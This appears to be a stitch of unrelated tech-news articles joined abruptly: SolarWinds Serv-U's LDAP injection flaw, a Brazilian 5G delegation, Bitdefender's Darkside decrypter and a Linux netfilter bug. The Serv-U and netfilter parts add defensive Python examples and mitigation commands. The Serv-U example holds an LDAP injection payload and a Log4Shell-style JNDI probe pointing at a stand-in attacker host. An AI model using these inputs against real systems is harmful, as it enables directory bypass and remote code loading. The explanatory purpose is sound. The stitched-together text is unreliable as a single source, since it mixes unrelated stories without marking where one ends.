
Microsoft researchers have discovered a previously undisclosed vulnerability in the SolarWinds Serv-U software while monitoring threats related to Log4J vulnerabilities. Jonathan Bar Or explained on Twitter that while he was hunting for a Log4J exploit attempt, he noticed attacks coming from serv-u.exe.
“Taking a closer look revealed you could feed Serv-U with data and it’ll build an LDAP query with your unsanitized input! This could be used for log4j attack attempts, but also for LDAP injection,” he wrote. “Solarwinds immediately responded, investigated and fixed the #vulnerability. Their response is the quickest I’ve seen, really amazing work on their part!”

Microsoft later published a blog post about the issue, tracked as CVE-2021-35247, describing it as an “input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation.”

In its advisory, SolarWinds said the Serv-U web login screen for LDAP authentication was accepting characters that were not sufficiently sanitized. “SolarWinds has updated the input mechanism to perform additional validation and sanitization. No downstream effect has been detected as the LDAP servers ignored improper characters,” the company said, adding that the flaw affects Serv-U 15.2.5 and previous versions.
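The pattern Bar Or describes, a login value concatenated straight into an LDAP search filter, beside the escaping that closes it, as an added example for this article. This is not Serv-U code and does not reproduce the query Serv-U built; the filter shape and the attribute names (objectClass, sAMAccountName) are assumptions chosen to look like a typical web-login lookup. The inputs are constructed: a benign login, a textbook injection payload, and a Log4Shell-style JNDI probe of the kind Bar Or was hunting for.

```python
"""
LDAP filter construction: the injectable pattern beside an escaped one.

Added example, not Serv-U code. Filter shape and attribute names are
assumptions; the three sample inputs at the bottom are constructed.
"""
from typing import List

# RFC 4515 section 3: characters that must appear as \XX escapes inside an
# assertion value. NUL is included because it terminates C strings.
_LDAP_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def ldap_escape(value: str) -> str:
    """Escape one assertion value for safe embedding in a search filter."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(username: str) -> str:
    """The bug class: the login name is concatenated into the filter as-is."""
    return "(&(objectClass=user)(sAMAccountName=" + username + "))"


def build_filter_safe(username: str) -> str:
    """The fix: the same filter, with the value escaped first."""
    return "(&(objectClass=user)(sAMAccountName=" + ldap_escape(username) + "))"


def top_level_filters(filter_text: str) -> List[str]:
    """Split a filter string into its top-level parenthesised groups.

    A well-formed search filter is exactly one group. Extra groups, or an
    unbalanced string (ValueError), are the signature of input that has
    broken out of the value position. Escaped parens (\\28, \\29) are
    ordinary characters here, which is exactly why escaping works.
    """
    groups: List[str] = []
    depth = 0
    start = 0
    for i, ch in enumerate(filter_text):
        if ch == "(":
            if depth == 0:
                start = i
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                raise ValueError("unbalanced ')' at offset %d" % i)
            if depth == 0:
                groups.append(filter_text[start:i + 1])
    if depth != 0:
        raise ValueError("unbalanced '(' in filter")
    return groups


def is_single_filter(filter_text: str) -> bool:
    """True when the text parses as exactly one balanced filter."""
    try:
        return len(top_level_filters(filter_text)) == 1
    except ValueError:
        return False


# Constructed sample inputs: a benign login, a classic LDAP-injection payload,
# and a Log4Shell-style probe string (attacker.invalid is a reserved name).
BENIGN = "jdoe"
INJECTION = "*)(uid=*))(|(uid=*"
JNDI_PROBE = "${jndi:ldap://attacker.invalid/a}"

if __name__ == "__main__":
    for name in (BENIGN, INJECTION, JNDI_PROBE):
        unsafe = build_filter_unsafe(name)
        safe = build_filter_safe(name)
        print("input:   ", repr(name))
        print("  unsafe:", unsafe, "->", len(top_level_filters(unsafe)), "filter(s)")
        print("  safe:  ", safe, "->", len(top_level_filters(safe)), "filter(s)")
```

Two things are worth noticing in the output. The injection payload turns one filter into two balanced filters; a directory server that only parses the first is left with (sAMAccountName=*), which matches every user. And the JNDI probe contains none of the RFC 4515 metacharacters, so escaping passes it through unchanged: escaping stops LDAP injection, while keeping a JNDI string away from a vulnerable Log4j logger is a separate control.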
NTT Application Security’s Ray Kelly told ZDNet that the vulnerability surprised and concerned him, considering SolarWinds is fresh on the heels of its previous breach that affected thousands of customers. “Given that the Log4j disclosure was published in December, this Open Source vulnerability should have been of the utmost priority for SolarWinds. While it appears that SolarWinds was not susceptible to having the vulnerable component exploited, it’s still not something you want in your software product,” Kelly said. “Most all application security products can detect the Log4j vulnerability, giving developers the ability to quickly identify and fix the issue.”

Microsoft urged customers to apply the security updates described in the SolarWinds advisory and said customers can use its tools to identify and remediate devices that have the vulnerability. Microsoft Defender Antivirus and Microsoft Defender for Endpoint also detect behavior related to the activity, the company added.

Netenrich’s John Bambenek added that Microsoft’s warning and SolarWinds’ quick response time represented a positive example of how vulnerabilities need to be dealt with. “This is the kind of vulnerability and research cooperation we need, where a major tech company with visibility to see the attacks reaches out to the software company and a fix is rushed to production,” Bambenek said.

Brazilian government officials will be meeting their US counterparts and investors as part of a plan intended to speed up the process around Brazil’s upcoming 5G auction. The US visit starts today (7) and will end on Friday (11). The agenda is led by Brazil’s Ministry of Communications and includes representatives from the Ministry of Foreign Affairs, the Ministry of Defense, the Special Secretariat for Strategic Affairs, the National Congress, as well as senators Ciro Nogueira and Flávio Bolsonaro, president Jair Bolsonaro’s son. Other participants in the meetings in the US are representatives from the Brazilian Intelligence Agency, as well as ministers and technical staff from the Federal Court of Auditors, which is currently analyzing the notice for the auction for the 5G spectrum, expected to take place in July.
The aim of the visit, according to the Ministry of Communications, is to “learn more about regulatory approaches to private communications networks and their implementation, as well as sharing experiences around cybersecurity”. During the meetings in Washington and New York, the ministers will visit the US Department of Defense, as well as the Department of National Intelligence and the Federal Communications Commission. According to Communications minister Fabio Faria, the meetings in the US are “a great solution” to expedite the 5G auction, since the Federal Court of Auditors will have the opportunity to have its questions in relation to the fifth-generation spectrum answered, especially when it comes to the implementation of the government’s private network. Another goal of the visit is to “promote the dialog with potential investors in the Brazilian telecommunications market”, the Ministry noted. The Brazilian government officials have meetings set up with Motorola, Qualcomm, IBM and AT&T, with investment funds and banks, and with consulting firm Eurasia. The Brazilian government’s US visit this week follows a previous tour led by the Ministry of Communications to some of the leading countries in the 5G space. During that visit, which took place in February, government officials visited Sweden, Finland, Japan and China. At the time, the Brazilian delegation visited companies such as Nokia and Ericsson in their home countries, and new meetings with these two companies will take place during the US visit.

Cybersecurity firm Bitdefender has released today a free tool that can help victims of the Darkside ransomware recover their encrypted files for free, without paying the ransom demand.
The tool, available for download from the Bitdefender site, along with usage instructions, gives hope to companies that had important files locked and ransomed by one of today’s most sophisticated ransomware operations.
Background into the Darkside group
Active since the summer of 2020, the Darkside group launched, and still recruits partners today, through ads posted on cybercrime forums.
The group uses a well-established Ransomware-as-a-Service (RaaS) model to partner with other cybercrime groups.
These groups would apply for the Darkside RaaS and receive a fully functional version of the Darkside ransomware. They would then breach companies using their own chosen methods, install the ransomware, and ask for huge payouts, usually in the realm of hundreds of thousands or millions of US dollars.
This modus operandi isn’t new, and it’s called “big-game hunting” because ransomware gangs usually tend to go after companies, instead of home users, in the hopes of increasing their profits.
In situations where victims didn’t want to pay, Darkside operators leak documents they stole from the victim’s network on a dedicated “leak site,” as a form of punishment and as a forewarning to other victims who may prefer to restore from backups instead of paying the crooks.
While the Darkside group hasn’t posted the names and data of any new victims on its leak site since before the winter holidays last year, the group is still believed to be active at the time of writing.
According to security researcher MalwareHunter, the most recent activity from the group is an update to its leak site last week, in which the Darkside operators added a new section dedicated to journalists, where reporters can register and get in contact with the Darkside gang directly.

DarkSide ransomware’s leak website now has a “Press Center” where press people can register. Also “recovery companies” can register and then they will get more and more discounts after each client they “helped”… Great news, right? 😂 @demonslay335 @VK_Intel pic.twitter.com/0wuGkbFGHK
— MalwareHunterTeam (@malwrhunterteam) January 8, 2021

While most Darkside victims have already either paid the ransom demand or restored from backup months ago, the Darkside decrypter is far from useless.
Will the decrypter lead to a Darkside shutdown?
First and foremost, the tool helps companies recover important files that were encrypted months before and which they weren’t able to restore but still have around, saved on backup drives.
Second, the tool imposes operational costs on the Darkside gang, which will now have to rework its file encryption code to prevent free decryptions.
Third, the tool also deals a major reputational blow to the Darkside RaaS. Many ransomware operations have shut down in the past after the release of a free decrypter, as most of their customers abandoned them for newer and non-decryptable competitors.
As for the victims themselves, the good news is that the free decrypter released today by Bitdefender should, in theory, work for all recent versions of the Darkside ransomware, regardless of the file extension that crooks added at the end of each encrypted file.
This extension is unique per victim, as it’s computed from local characteristics, but that shouldn’t be a problem, Bitdefender said. More
Behind almost all Linux firewall tools, such as iptables, its successor nftables, firewalld, and ufw, is netfilter, the kernel subsystem that controls access to and from the Linux network stack. It’s an essential piece of Linux security, so when a security hole is found in it, it’s a big deal.
Nick Gregory, a Sophos threat researcher, found this hole recently while checking netfilter for possible security problems. Gregory explains his bug hunt in great detail, and I recommend it for those who want insight into finding C errors. But for those of you who just want to cut to the chase, here’s the story.

This is a serious bug. Specifically, it’s a heap out-of-bounds write in the kernel’s netfilter code. Gregory said it’s “exploitable to achieve kernel code execution (via ROP [return-oriented programming]), giving full local privilege escalation, container escape, whatever you want.” Yuck!

The problem exists because netfilter doesn’t handle its hardware offload feature correctly. A local, unprivileged attacker can use it to cause a denial of service (DoS), execute arbitrary code, and cause general mayhem. Adding insult to injury, this works even if the hardware being attacked doesn’t have offload functionality. That’s because, as Gregory wrote to a security list, “Despite being in code dealing with hardware offload, this is reachable when targeting network devices that don’t have offload functionality (e.g. lo) as the bug is triggered before the rule creation fails.”

The vulnerability is present in Linux kernel versions 5.4 through 5.6.10. It is tracked as CVE-2022-25636 and carries a Common Vulnerability Scoring System (CVSS) score of 7.8, so this is a real baddie. How bad? In its advisory, Red Hat said, “This flaw allows a local attacker with a user account on the system to gain access to out-of-bounds memory, leading to a system crash or a privilege escalation threat.” So, yes, this is bad.

Worse still, it affects recent major distribution releases such as Red Hat Enterprise Linux (RHEL) 8.x, Debian Bullseye, Ubuntu Linux, and SUSE Linux Enterprise 15.3.
While the Linux kernel netfilter patch has been made, it isn’t available yet in all distribution releases. If you don’t have a patch yet, you can mitigate the problem by disabling unprivileged user namespaces, which is how a local user without root reaches the affected netfilter code in the first place. In the RHEL family, use:

    # echo 0 > /proc/sys/user/max_user_namespaces
    # sudo sysctl --system

And in the Debian/Ubuntu family:

    $ sudo sysctl kernel.unprivileged_userns_clone=0

One caveat: writing to /proc, or setting a value with sysctl on the command line, takes effect immediately but does not survive a reboot. To make either setting persistent, put it in a file under /etc/sysctl.d/, which is what sysctl --system reloads.

So, here we are again. I’ve not seen a good exploit of this, but I have seen one that works about half the time. If you don’t want to see your Linux servers stolen out from underneath you or just knocked off the net, it’s time to either patch your system or lock it down to avoid trouble.
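A check for the situation described above, a kernel inside the quoted version window with or without the user-namespace mitigation in place, as an added example for this article. It is not Sophos or Red Hat tooling. The version window is the one the article quotes, and the two /proc paths are the ones behind the sysctl commands above; the sample version strings in the usage are constructed.

```python
"""
Exposure check for CVE-2022-25636: version window plus userns mitigation.

Added example, not vendor tooling. The window (5.4 through 5.6.10) is the
one quoted in the article. Distribution kernels backport fixes under their
own version strings, so "exposed" means "check your vendor's advisory and
patch level", not "confirmed vulnerable".
"""
import platform
import re
from pathlib import Path
from typing import Optional, Tuple

AFFECTED_MIN = (5, 4, 0)
AFFECTED_MAX = (5, 6, 10)

# The knob each distribution family exposes (only one of the two exists on
# a given system, which is why both readers tolerate a missing file).
RHEL_MAX_USER_NS = "/proc/sys/user/max_user_namespaces"
DEBIAN_USERNS_CLONE = "/proc/sys/kernel/unprivileged_userns_clone"

ADVICE = {
    "outside-window": "outside the quoted window; confirm with your vendor's "
                      "CVE-2022-25636 advisory rather than the version alone",
    "mitigated": "in the window, but unprivileged user namespaces are "
                 "disabled; keep that until the kernel is patched",
    "exposed": "in the window and unprivileged user namespaces are allowed; "
               "patch, or apply the sysctl mitigation and persist it",
}


def parse_kernel_version(release: str) -> Tuple[int, int, int]:
    """'5.4.0-104-generic' -> (5, 4, 0); '5.6.10' -> (5, 6, 10)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def kernel_in_quoted_window(release: str) -> bool:
    """True when the release falls inside AFFECTED_MIN..AFFECTED_MAX."""
    return AFFECTED_MIN <= parse_kernel_version(release) <= AFFECTED_MAX


def userns_mitigated(max_user_namespaces: Optional[str],
                     unprivileged_userns_clone: Optional[str]) -> bool:
    """True if either knob denies unprivileged user namespaces.

    Arguments are raw file contents, or None when the file is absent.
    """
    for raw in (max_user_namespaces, unprivileged_userns_clone):
        if raw is not None and raw.strip() == "0":
            return True
    return False


def assess(release: str, max_user_namespaces: Optional[str],
           unprivileged_userns_clone: Optional[str]) -> str:
    """Return one of the ADVICE keys for the given kernel and sysctl state."""
    if not kernel_in_quoted_window(release):
        return "outside-window"
    if userns_mitigated(max_user_namespaces, unprivileged_userns_clone):
        return "mitigated"
    return "exposed"


def read_sysctl(path: str) -> Optional[str]:
    """Read a /proc/sys file, returning None if it does not exist here."""
    try:
        return Path(path).read_text()
    except OSError:
        return None


if __name__ == "__main__":
    release = platform.release()
    status = assess(release,
                    read_sysctl(RHEL_MAX_USER_NS),
                    read_sysctl(DEBIAN_USERNS_CLONE))
    print("%s: %s (%s)" % (release, status, ADVICE[status]))
```

Run it as any user on the host; it reads only /proc/sys, so no privileges are needed. A result of "mitigated" on a RHEL-family box means max_user_namespaces is 0, on a Debian-family box that unprivileged_userns_clone is 0; either way the usual reachability path for a non-root local user is closed, which is exactly what the commands above do.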